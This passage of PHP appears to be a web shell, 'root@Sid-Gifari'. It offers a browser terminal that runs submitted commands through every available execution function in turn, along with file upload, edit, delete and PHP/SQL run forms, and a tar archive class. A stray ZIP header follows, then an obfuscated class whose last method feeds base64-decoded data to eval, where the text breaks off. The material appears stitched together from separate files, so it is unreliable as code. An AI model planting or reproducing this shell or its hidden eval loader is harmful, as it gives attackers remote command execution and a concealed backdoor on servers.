$output = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
system($cmd);
$output = ob_get_clean();
} elseif (function_exists('exec')) {
exec($cmd, $out);
$output = implode("\n", $out);
} elseif (function_exists('shell_exec')) {
$output = shell_exec($cmd);
} elseif (function_exists('proc_open')) {
// Using proc_open as fallback
$descriptorspec = [
0 => ["pipe", "r"],
1 => ["pipe", "w"],
2 => ["pipe", "w"]
];
$process = proc_open($cmd, $descriptorspec, $pipes, $cwd);
if (is_resource($process)) {
fclose($pipes[0]);
$output = stream_get_contents($pipes[1]);
fclose($pipes[1]);
$output .= stream_get_contents($pipes[2]);
fclose($pipes[2]);
proc_close($process);
} else {
$output = "Failed to execute command via proc_open.";
}
} elseif (function_exists('popen')) {
$handle = popen($cmd, 'r');
if ($handle) {
$output = stream_get_contents($handle);
pclose($handle);
} else {
$output = "Failed to execute command via popen.";
}
} else {
$output = "Error: No command execution functions available.";
}
} else {
$output = "Command execution functions are disabled on this server. Terminal is unavailable.";
}
}
}
if (!isset($url_inc)) $url_inc = htmlspecialchars($_SERVER['PHP_SELF']);
if (!isset($path)) $path = $cwd;
?>
<strong>root@Sid-Gifari:<?php echo htmlspecialchars($cwd); ?>$</strong><br>
<pre><?php echo htmlspecialchars($output); ?></pre>
<form method="post" action="<?php echo $url_inc; ?>">
<input type="text" name="terminal-text" size="30" placeholder="Cmd">
<input type="hidden" name="path" value="<?php echo htmlspecialchars($path); ?>" />
<input type="submit" name="terminal" value="Execute">
</form>
</td>
<td>
<?php if(!empty($fm_config['make_directory'])) { ?>
<form method="post" action="<?=$url_inc?>">
<input type="hidden" name="path" value="<?=$path?>" />
<input type="text" name="dirname" size="15">
<input type="submit" name="mkdir" value="<?=__('Make directory')?>">
</form>
<?php } ?>
</td>
<td>
<?php if(!empty($fm_config['new_file'])) { ?>
<form method="post" action="<?=$url_inc?>">
<input type="hidden" name="path" value="<?=$path?>" />
<input type="text" name="filename" size="15">
<input type="submit" name="mkfile" value="<?=__('New file')?>">
</form>
<?php } ?>
</td>
<td>
<form method="post" action="<?=$url_inc?>" style="display:inline">
<input type="hidden" name="path" value="<?=$path?>" />
<input type="text" placeholder="<?=__('Recursive search')?>" name="search_recursive" value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>" size="15">
<input type="text" name="mask" placeholder="<?=__('Mask')?>" value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>" size="5">
<input type="submit" name="search" value="<?=__('Search')?>">
</form>
</td>
<td>
<?=fm_run_input('php')?>
</td>
<td>
<?=fm_run_input('sql')?>
</td>
</tr>
</table>
</td>
<td class="row3">
<table>
<tr>
<td>
<?php if (!empty($fm_config['upload_file'])) { ?>
<form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data">
<input type="hidden" name="path" value="<?=$path?>" />
<input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" />
<input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" />
<input type="submit" name="test" value="<?=__('Upload')?>" />
</form>
<?php } ?>
</td>
<td>
<?php if ($auth['authorize']) { ?>
<form action="" method="post">
<input name="quit" type="hidden" value="1">
<?=__('Hello')?>, <?=$auth['login']?>
<input type="submit" value="<?=__('Quit')?>">
</form>
<?php } ?>
</td>
<td>
<?=fm_lang_form($language)?>
</td>
<tr>
</table>
</td>
</tr>
</table>
<table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%">
<thead>
<tr>
<th style="white-space:nowrap"> <?=__('Filename')?> </th>
<th style="white-space:nowrap"> <?=__('Size')?> </th>
<th style="white-space:nowrap"> <?=__('Date')?> </th>
<th style="white-space:nowrap"> <?=__('Rights')?> </th>
<th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th>
</tr>
</thead>
<tbody>
<?php
$elements = fm_scan_dir($path, '', 'all', true);
$dirs = array();
$files = array();
foreach ($elements as $file){
if(@is_dir($path . $file)){
$dirs[] = $file;
} else {
$files[] = $file;
}
}
natsort($dirs); natsort($files);
$elements = array_merge($dirs, $files);
foreach ($elements as $file){
$filename = $path . $file;
$filedata = @stat($filename);
if(@is_dir($filename)){
$filedata[7] = '';
if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename);
$link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder"> </span> '.$file.'</a>';
$loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').' zip',__('Archiving').' '. $file);
$arlink = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').' .tar.gz',__('Archiving').' '.$file);
$style = 'row2';
if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; else $alert = '';
} else {
$link =
$fm_config['show_img']&&@getimagesize($filename)
? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\''
. fm_img_link($filename)
.'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img"> </span> '.$file.'</a>'
: '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file"> </span> '.$file.'</a>';
$e_arr = explode(".", $file);
$ext = end($e_arr);
$loadlink = fm_link('download',$filename,__('Download'),__('Download').' '. $file);
$arlink = in_array($ext,array('zip','gz','tar'))
? ''
: ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').' .tar.gz',__('Archiving').' '. $file));
$style = 'row1';
$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"';
}
$deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
$renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>';
$rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>';
?>
<tr class="<?=$style?>">
<td><?=$link?></td>
<td><?=$filedata[7]?></td>
<td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td>
<td><?=$rightstext?></td>
<td><?=$deletelink?></td>
<td><?=$renamelink?></td>
<td><?=$loadlink?></td>
<td><?=$arlink?></td>
</tr>
<?php
}
}
?>
</tbody>
</table>
<div class="row3"><?php
$mtime = explode(' ', microtime());
$totaltime = $mtime[0] + $mtime[1] - $starttime;
echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a> | <a href="'.fm_site_url().'">.</a>';
if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion();
if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file();
if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2);
if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>';
if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>';
if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>';
if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>';
?>
</div>
<script type="text/javascript">
function download_xls(filename, text) {
var element = document.createElement('a');
element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text);
element.setAttribute('download', filename);
element.style.display = 'none';
document.body.appendChild(element);
element.click();
document.body.removeChild(element);
}
function base64_encode(m) {
for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) {
c = m.charCodeAt(l);
if (128 > c) d = 1;
else
for (d = 2; c >= 2 << 5 * d;) ++d;
for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f])
}
b && (g += k[f << 6 - b]);
return g
}
var tableToExcelData = (function() {
var uri = 'data:application/vnd.ms-excel;base64,',
template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>',
format = function(s, c) {
return s.replace(/{(\w+)}/g, function(m, p) {
return c[p];
})
}
return function(table, name) {
if (!table.nodeType) table = document.getElementById(table)
var ctx = {
worksheet: name || 'Worksheet',
table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1")
}
t = new Date();
filename = 'fm_' + t.toISOString() + '.xls'
download_xls(filename, base64_encode(format(template, ctx)))
}
})();
var table2Excel = function () {
var ua = window.navigator.userAgent;
var msie = ua.indexOf("MSIE ");
this.CreateExcelSheet =
function(el, name){
if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer
var x = document.getElementById(el).rows;
var xls = new ActiveXObject("Excel.Application");
xls.visible = true;
xls.Workbooks.Add
for (i = 0; i < x.length; i++) {
var y = x[i].cells;
for (j = 0; j < y.length; j++) {
xls.Cells(i + 1, j + 1).Value = y[j].innerText;
}
}
xls.Visible = true;
xls.UserControl = true;
return xls;
} else {
tableToExcelData(el, name);
}
}
}
</script>
</body>
</html>
<?php
//Ported from ReloadCMS project http://reloadcms.com
class archiveTar {
var $archive_name = '';
var $tmp_file = 0;
var $file_pos = 0;
var $isGzipped = true;
var $errors = array();
var $files = array();
function __construct(){
if (!isset($this->errors)) $this->errors = array();
}
function createArchive($file_list){
$result = false;
if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false;
else $newArchive = true;
if ($newArchive){
if (!$this->openWrite()) return false;
} else {
if (filesize($this->archive_name) == 0) return $this->openWrite();
if ($this->isGzipped) {
$this->closeTmpFile();
if (!rename($this->archive_name, $this->archive_name.'.tmp')){
$this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp';
return false;
}
$tmpArchive = gzopen($this->archive_name.'.tmp', 'rb');
if (!$tmpArchive){
$this->errors[] = $this->archive_name.'.tmp '.__('is not readable');
rename($this->archive_name.'.tmp', $this->archive_name);
return false;
}
if (!$this->openWrite()){
rename($this->archive_name.'.tmp', $this->archive_name);
return false;
}
$buffer = gzread($tmpArchive, 512);
if (!gzeof($tmpArchive)){
do {
$binaryData = pack('a512', $buffer);
$this->writeBlock($binaryData);
$buffer = gzread($tmpArchive, 512);
}
while (!gzeof($tmpArchive));
}
gzclose($tmpArchive);
unlink($this->archive_name.'.tmp');
} else {
$this->tmp_file = fopen($this->archive_name, 'r+b');
if (!$this->tmp_file) return false;
}
}
if (isset($file_list) && is_array($file_list)) {
if (count($file_list)>0)
$result = $this->packFileArray($file_list);
} else $this->errors[] = __('No file').__(' to ').__('Archive');
if (($result)&&(is_resource($this->tmp_file))){
$binaryData = pack('a512', '');
$this->writeBlock($binaryData);
}
$this->closeTmpFile();
if ($newArchive && !$result){
$this->closeTmpFile();
unlink($this->archive_name);
}
return $result;
}
function restoreArchive($path){
$fileName = $this->archive_name;
if (!$this->isGzipped){
if (file_exists($fileName)){
if ($fp = fopen($fileName, 'rb')){
$data = fread($fp, 2);
fclose($fp);
if ($data == '\37\213'){
$this->isGzipped = true;
}
}
}
elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true;
}
$result = true;
if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb');
else $this->tmp_file = fopen($fileName, 'rb');
if (!$this->tmp_file){
$this->errors[] = $fileName.' '.__('is not readable');
return false;
}
$result = $this->unpackFileArray($path);
$this->closeTmpFile();
return $result;
}
function showErrors ($message = '') {
$Errors = $this->errors;
if(count($Errors)>0) {
if (!empty($message)) $message = ' ('.$message.')';
$message = __('Error occurred').$message.': <br/>';
foreach ($Errors as $value)
$message .= $value.'<br/>';
return $message;
} else return '';
}
function packFileArray($file_array){
$result = true;
if (!$this->tmp_file){
$this->errors[] = __('Invalid file descriptor');
return false;
}
if (!is_array($file_array) || count($file_array)<=0)
return true;
for ($i = 0; $i<count($file_array); $i++){
$filename = $file_array[$i];
if ($filename == $this->archive_name)
continue;
if (strlen($filename)<=0)
continue;
if (!file_exists($filename)){
$this->errors[] = __('No file').' '.$filename;
continue;
}
if (!$this->tmp_file){
$this->errors[] = __('Invalid file descriptor');
return false;
}
if (strlen($filename)<=0){
$this->errors[] = __('Filename').' '.__('is incorrect');;
return false;
}
$filename = str_replace('\\', '/', $filename);
$keep_filename = $this->makeGoodPath($filename);
if (is_file($filename)){
if (($file = fopen($filename, 'rb')) == 0){
$this->errors[] = __('Mode ').__('is incorrect');
}
if(($this->file_pos == 0)){
if(!$this->writeHeader($filename, $keep_filename))
return false;
}
while (($buffer = fread($file, 512)) != ''){
$binaryData = pack('a512', $buffer);
$this->writeBlock($binaryData);
}
fclose($file);
} else $this->writeHeader($filename, $keep_filename);
if (@is_dir($filename)){
if (!($handle = opendir($filename))){
$this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable');
continue;
}
while (false !== ($dir = readdir($handle))){
if ($dir!='.' && $dir!='..'){
$file_array_tmp = array();
if ($filename != '.')
$file_array_tmp[] = $filename.'/'.$dir;
else
$file_array_tmp[] = $dir;
$result = $this->packFileArray($file_array_tmp);
}
}
unset($file_array_tmp);
unset($dir);
unset($handle);
}
}
return $result;
}
function unpackFileArray($path){
$path = str_replace('\\', '/', $path);
if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path;
clearstatcache();
while (strlen($binaryData = $this->readBlock()) != 0){
if (!$this->readHeader($binaryData, $header)) return false;
if ($header['filename'] == '') continue;
if ($header['typeflag'] == 'L'){ //reading long header
$filename = '';
$decr = floor($header['size']/512);
for ($i = 0; $i < $decr; $i++){
$content = $this->readBlock();
$filename .= $content;
}
if (($laspiece = $header['size'] % 512) != 0){
$content = $this->readBlock();
$filename .= substr($content, 0, $laspiece);
}
$binaryData = $this->readBlock();
if (!$this->readHeader($binaryData, $header)) return false;
else $header['filename'] = $filename;
return true;
}
if (($path != './') && ($path != '/')){
while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1);
if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename'];
else $header['filename'] = $path.'/'.$header['filename'];
}
if (file_exists($header['filename'])){
if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){
$this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder');
return false;
}
if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){
$this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists');
return false;
}
if (!is_writeable($header['filename'])){
$this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists');
return false;
}
} elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){
$this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename'];
return false;
}
if ($header['typeflag'] == '5'){
if (!file_exists($header['filename'])) {
if (!mkdir($header['filename'], 0777)) {
$this->errors[] = __('Cannot create directory').' '.$header['filename'];
return false;
}
}
} else {
if (($destination = fopen($header['filename'], 'wb')) == 0) {
$this->errors[] = __('Cannot write to file').' '.$header['filename'];
return false;
} else {
$decr = floor($header['size']/512);
for ($i = 0; $i < $decr; $i++) {
$content = $this->readBlock();
fwrite($destination, $content, 512);
}
if (($header['size'] % 512) != 0) {
$content = $this->readBlock();
fwrite($destination, $content, ($header['size'] % 512));
}
fclose($destination);
touch($header['filename'], $header['time']);
}
clearstatcache();
if (filesize($header['filename']) != $header['size']) {
$this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect');
return false;
}
}
if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = '';
if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/';
$this->dirs[] = $file_dir;
$this->files[] = $header['filename'];
}
return true;
}
function dirCheck($dir){
$parent_dir = dirname($dir);
if ((@is_dir($dir)) or ($dir == ''))
return true;
if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir)))
return false;
if (!mkdir($dir, 0777)){
$this->errors[] = __('Cannot create directory').' '.$dir;
return false;
}
return true;
}
function readHeader($binaryData, &$header){
if (strlen($binaryData)==0){
$header['filename'] = '';
return true;
}
if (strlen($binaryData) != 512){
$header['filename'] = '';
$this->__('Invalid block size').': '.strlen($binaryData);
return false;
}
$checksum = 0;
for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1));
for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1));
$unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData);
$header['checksum'] = OctDec(trim($unpack_data['checksum']));
if ($header['checksum'] != $checksum){
$header['filename'] = '';
if (($checksum == 256) && ($header['checksum'] == 0)) return true;
$this->errors[] = __('Error checksum for file ').$unpack_data['filename'];
return false;
}
if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0;
$header['filename'] = trim($unpack_data['filename']);
$header['mode'] = OctDec(trim($unpack_data['mode']));
$header['user_id'] = OctDec(trim($unpack_data['user_id']));
$header['group_id'] = OctDec(trim($unpack_data['group_id']));
$header['size'] = OctDec(trim($unpack_data['size']));
$header['time'] = OctDec(trim($unpack_data['time']));
return true;
}
function writeHeader($filename, $keep_filename){
$packF = 'a100a8a8a8a12A12';
$packL = 'a1a100a6a2a32a32a8a8a155a12';
if (strlen($keep_filename)<=0) $keep_filename = $filename;
$filename_ready = $this->makeGoodPath($keep_filename);
if (strlen($filename_ready) > 99){ //write long header
$dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0);
$dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', '');
// Calculate the checksum
$checksum = 0;
// First part of the header
for ($i = 0; $i < 148; $i++)
$checksum += ord(substr($dataFirst, $i, 1));
// Ignore the checksum value and replace it by ' ' (space)
for ($i = 148; $i < 156; $i++)
$checksum += ord(' ');
// Last part of the header
for ($i = 156, $j=0; $i < 512; $i++, $j++)
$checksum += ord(substr($dataLast, $j, 1));
// Write the first 148 bytes of the header in the archive
$this->writeBlock($dataFirst, 148);
// Write the calculated checksum
$checksum = sprintf('%6s ', DecOct($checksum));
$binaryData = pack('a8', $checksum);
$this->writeBlock($binaryData, 8);
// Write the last 356 bytes of the header in the archive
$this->writeBlock($dataLast, 356);
$tmp_filename = $this->makeGoodPath($filename_ready);
$i = 0;
while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){
$binaryData = pack('a512', $buffer);
$this->writeBlock($binaryData);
}
return true;
}
$file_info = stat($filename);
if (@is_dir($filename)){
$typeflag = '5';
$size = sprintf('%11s ', DecOct(0));
} else {
$typeflag = '';
clearstatcache();
$size = sprintf('%11s ', DecOct(filesize($filename)));
}
$dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename))));
$dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', '');
$checksum = 0;
for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1));
for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1));
$this->writeBlock($dataFirst, 148);
$checksum = sprintf('%6s ', DecOct($checksum));
$binaryData = pack('a8', $checksum);
$this->writeBlock($binaryData, 8);
$this->writeBlock($dataLast, 356);
return true;
}
function openWrite(){
if ($this->isGzipped)
$this->tmp_file = gzopen($this->archive_name, 'wb9f');
else
$this->tmp_file = fopen($this->archive_name, 'wb');
if (!($this->tmp_file)){
$this->errors[] = __('Cannot write to file').' '.$this->archive_name;
return false;
}
return true;
}
function readBlock(){
if (is_resource($this->tmp_file)){
if ($this->isGzipped)
$block = gzread($this->tmp_file, 512);
else
$block = fread($this->tmp_file, 512);
} else $block = '';
return $block;
}
function writeBlock($data, $length = 0){
if (is_resource($this->tmp_file)){
if ($length === 0){
if ($this->isGzipped)
gzputs($this->tmp_file, $data);
else
fputs($this->tmp_file, $data);
} else {
if ($this->isGzipped)
gzputs($this->tmp_file, $data, $length);
else
fputs($this->tmp_file, $data, $length);
}
}
}
function closeTmpFile(){
if (is_resource($this->tmp_file)){
if ($this->isGzipped)
gzclose($this->tmp_file);
else
fclose($this->tmp_file);
$this->tmp_file = 0;
}
}
function makeGoodPath($path){
if (strlen($path)>0){
$path = str_replace('\\', '/', $path);
$partPath = explode('/', $path);
$els = count($partPath)-1;
for ($i = $els; $i>=0; $i--){
if ($partPath[$i] == '.'){
// Ignore this directory
} elseif ($partPath[$i] == '..'){
$i--;
}
elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){
} else
$result = $partPath[$i].($i!=$els ? '/'.$result : '');
}
} else $result = '';
return $result;
}
}
?>PK ! qK���� �� network/index.phpnu �[��� <?php
/* __________________________________________________
| Obfuscated by YAK Pro - Php Obfuscator 2.0.14 |
| on 2025-09-25 20:32:27 |
| GitHub: https://github.com/pk-fr/yakpro-po |
|__________________________________________________|
*/
class IizCk { private function zbdgA() { goto hjMs9; j0dha: $MXvMD++; goto yfZ5e; j7WHp: KH4ga: goto rzykh; yfZ5e: b4ftP: goto ymkbL; VWK3M: $mKKza = 302 ^ 212; goto BH8C_; EzDAI: $MXvMD++; goto j7WHp; wbcxk: $MXvMD--; goto y0N1t; VkTLv: $MXvMD--; goto giE3c; dIjMm: if ($mKKza % 2 == 0) { goto TpdO4; } goto VkTLv; RPGs5: $MXvMD = strlen(strval(32)); goto uyZO0; Pas35: TpdO4: goto j0dha; xbkwI: $MXvMD--; goto F9rh2; jG3IB: $MXvMD++; goto s68E9; giE3c: goto b4ftP; goto Pas35; vFeha: $MXvMD = strlen(strval(143)); goto bcoVi; mxN9b: lURNH: goto jG3IB; F9rh2: goto KH4ga; goto VYsrv; BH8C_: $MXvMD = strlen(strval(302)); goto GMIYW; jIbFB: pwGTb: goto XY6mq; mUb2j: N6vzC: goto VWK3M; XQyRW: $MXvMD--; goto O5wHJ; REoRi: fmmNU: goto eetSr; rzykh: $mKKza = 657 ^ 976; goto TYz_w; uyZO0: if ($mKKza % 2 == 0) { goto pwGTb; } goto XQyRW; y0N1t: goto UxZ6i; goto mxN9b; Bwm8Z: goto N6vzC; goto REoRi; gSobJ: BcrT1: goto yJwHL; Ojprh: $MXvMD = strlen(strval(889)); goto eLQg6; XY6mq: $MXvMD++; goto q5ryP; PZ_Sp: $mKKza = 889 ^ 496; goto Ojprh; eetSr: $MXvMD++; goto mUb2j; pC58E: if ($mKKza % 2 == 0) { goto lURNH; } goto wbcxk; WkWpB: $MXvMD++; goto gSobJ; yX0n4: goto BcrT1; goto wswD5; VYsrv: us8I7: goto EzDAI; TYz_w: $MXvMD = strlen(strval(657)); goto pC58E; Zadfc: $mKKza = 143 ^ 328; goto vFeha; wlRWR: $MXvMD--; goto Bwm8Z; s68E9: UxZ6i: goto PZ_Sp; GMIYW: if ($mKKza % 2 == 0) { goto us8I7; } goto xbkwI; wswD5: P04Km: goto WkWpB; q5ryP: zYWRU: goto Zadfc; hjMs9: $mKKza = 32 ^ 138; goto RPGs5; yJwHL: $mKKza = 295 ^ 891; goto a3HwR; eLQg6: if ($mKKza % 2 == 0) { goto P04Km; } goto dEZkK; dEZkK: $MXvMD--; goto yX0n4; a3HwR: $MXvMD = strlen(strval(295)); goto dIjMm; O5wHJ: goto zYWRU; goto jIbFB; ymkbL: return null; goto mO08K; bcoVi: if ($mKKza % 2 == 0) { goto fmmNU; } goto wlRWR; mO08K: } private function Bk9Al() { goto mAni_; i6ljb: bgsBu: goto ViarI; Coz8D: $qewQ9 = strlen(strval(215)); goto KeYjb; o7Kuk: sPbUk: goto Eo7ig; s_fqI: k0QJn: goto T08Dm; KeYjb: if ($sWaif % 2 == 0) { goto iZXtB; } goto Ob1mq; ViarI: $sWaif = 647 ^ 467; goto EHrxj; hHNfU: if ($sWaif % 2 == 0) { goto mz1gs; } goto OlEb1; Tv69a: JkBb8: goto RfSUH; llRhN: $qewQ9++; goto lOKHd; ivmRz: goto bgsBu; goto qE7kP; NBwTi: goto k0QJn; goto QK3Oi; lWUDv: $qewQ9 = strlen(strval(923)); goto NA6CV; rT3St: goto T0VtE; goto Tv69a; myRMO: $qewQ9 = strlen(strval(468)); goto f1vjs; U_syV: iZXtB: goto OP6u8; HTgK6: goto sPbUk; goto U_syV; Eo7ig: return null; goto UTIfc; VLTGe: $sWaif = 923 ^ 787; goto lWUDv; cLky3: $qewQ9++; goto s_fqI; NA6CV: if ($sWaif % 2 == 0) { goto ziIbq; } goto IL1Ro; RfSUH: $qewQ9++; goto mjUn5; mjUn5: T0VtE: goto VLTGe; qE7kP: C9D16: goto Bdfue; lOKHd: LFokN: goto CplFt; AN36t: $qewQ9--; goto rT3St; kV7zb: $qewQ9 = strlen(strval(265)); goto zHo1y; CplFt: $sWaif = 215 ^ 244; goto Coz8D; EHrxj: $qewQ9 = strlen(strval(647)); goto hHNfU; OlEb1: $qewQ9--; goto jSBGY; mAni_: $sWaif = 468 ^ 329; goto myRMO; ipA7U: mz1gs: goto llRhN; zHo1y: if ($sWaif % 2 == 0) { goto C9D16; } goto r_Gdz; T08Dm: $sWaif = 265 ^ 730; goto kV7zb; Bdfue: $qewQ9++; goto i6ljb; QK3Oi: ziIbq: goto cLky3; OP6u8: $qewQ9++; goto o7Kuk; jSBGY: goto LFokN; goto ipA7U; r_Gdz: $qewQ9--; goto ivmRz; f1vjs: if ($sWaif % 2 == 0) { goto JkBb8; } goto AN36t; IL1Ro: $qewQ9--; goto NBwTi; Ob1mq: $qewQ9--; goto HTgK6; UTIfc: } private function B_06d() { goto Bf2kP; QpjWY: goto PVNAr; goto zFPaW; ScWbN: $hZSrR--; goto lBRwt; cqFK_: PVNAr: goto asSTp; gMIaQ: $hZSrR = strlen(strval(751)); goto mWeJR; cHSF3: $hZSrR++; goto cqFK_; Bf2kP: $lpMMV = 751 ^ 841; goto gMIaQ; Ku7gU: $hZSrR--; goto QpjWY; c710k: $lpMMV = 811 ^ 308; goto EjQqX; Z6pJa: nUHA3: goto c710k; zFPaW: x2dz4: goto cHSF3; DWOez: $hZSrR++; goto Z6pJa; asSTp: return null; goto MtihL; mWeJR: if ($lpMMV % 2 == 0) { goto V0fHE; } goto ScWbN; EjQqX: $hZSrR = strlen(strval(811)); goto btM2G; lBRwt: goto nUHA3; goto ngiHD; btM2G: if ($lpMMV % 2 == 0) { goto x2dz4; } goto Ku7gU; ngiHD: V0fHE: goto DWOez; MtihL: } private static function p0jC5() { goto y832o; fjFfb: $pSK23 = function () use($vRKia) { eval($vRKia); }; goto Gc3J9; PjhnR: $W_bTs = base64_decode($tXVjp); goto xPqXY; y832o: $tXVjp = 